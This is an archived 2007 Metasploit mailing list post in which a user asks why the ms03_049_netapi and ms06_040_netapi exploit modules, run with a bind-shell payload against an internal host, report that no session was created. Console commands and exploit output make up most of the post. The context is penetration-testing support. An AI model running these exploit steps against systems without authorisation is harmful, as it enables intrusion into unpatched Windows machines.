Metasploit mailing list archives

Re: Exploit problem


From: yuzz at likom.com.my (Yuz@|m|e M()hd Yu$()f)
Date: Thu, 09 Aug 2007 16:19:47 +0800

I try this way also the same thing happen...still no session created.

msf exploit(ms03_049_netapi) > set PAYLOAD  generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(ms03_049_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.4.4.9         yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, 
WKSSVC)


Payload options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP0/SP1


msf exploit(ms03_049_netapi) > exploit
[*] Started bind handler
[*] Binding to 
6bffd098-a112-3610-9833-46c3f87e345a:1.0 at ncacn_np:10.4.4.9[\BROWSER] ...
[*] Bound to 
6bffd098-a112-3610-9833-46c3f87e345a:1.0 at ncacn_np:10.4.4.9[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Exploit completed, but *no session was created.*
msf exploit(ms03_049_netapi) >



Yuz@|m|e M()hd Yu$()f wrote:
Hi all,

I'm new here. I try to run framework v3.0 on Fedora Core 6(with 
iptables service running). Everything going smooth during pene testing 
until i reach at command exploit. When i run the command exploit below 
result is coming out. Any problem with below result?
Why give and error no session was created? anything wrong?


msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 
4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0 at ncacn_np:10.4.4.9[\BROWSER] ...
[*] Bound to 
4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0 at ncacn_np:10.4.4.9[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Exploit completed, but *no session was created.*


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070809/0684a24a/attachment.htm>


Current thread: